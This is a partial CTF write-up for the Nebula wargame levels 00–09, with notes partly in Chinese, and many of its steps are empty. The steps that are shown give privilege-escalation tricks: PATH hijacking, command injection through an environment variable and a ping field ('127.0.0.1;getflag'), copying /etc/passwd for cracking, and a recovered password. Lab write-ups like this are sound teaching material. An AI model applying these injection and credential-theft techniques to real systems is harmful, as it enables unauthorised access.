Nebula Writeup
level00
About
This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories.
Alternatively, look at the find man page.
To access this level, log in as level00 with the password of level00.
Key Points
- find
- uid
Writeup
- Step 1
|
- Step 2
|
- Step 3
|
level 01
About
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.
SourceCode
|
Key Points
env
- 修改环境变量
Writeup
- Step 1
level01@nebula:~$ ln -s /bin/getflag echo
- Step 2
level01@nebula:~$ export PATH=/home/level01:$PATH
- Step 3
|
level02
About
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02.
SourceCode
|
Key Points
- 环境变量
Writeups
- Step 1
level02@nebula:~$ export USER="&& /bin/getflag"
level03
About
Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.
SourceCode
|
Key Points
- Crontab
- shell脚本
Writeups
/home/flag03/writable.d
下建一个可执行脚本
|
PS:
sudo ls /var/spool/cron/crontabs
level04
About
This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)
To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.
SourceCode
|
Key Points
strstr
Writeups
- Step 1
|
- Step 2
|
level05
About
Check the flag05 home directory. You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.
Key Points
- ssh
Writeups
- Step 1
level05@nebula:/home/flag05/.backup$ tar xvf backup-19072011.tgz -C /tmp/
- Step 2
|
level06
About
The flag06 account credentials came from a legacy unix system.
To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.
Key Points
Witeups
- Step 1
copy出/etc/passwd
文件
- Step 2
|
level07
About
The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.
To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.
SourceCode
|
Key Points
Writeups
127.0.0.1;getflag
level08
About
World readable files strike again. Check what that user was up to, and use it to log into flag08 account.
To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08.
key Points
7f
–> del
Writeups
|
Password is backd00Rmate
level09
ABout
There’s a C setuid wrapper for some vulnerable PHP code…
To do this level, log in as the level09 account with the password level09. Files for this level can be found in /home/flag09.
SourceCode
|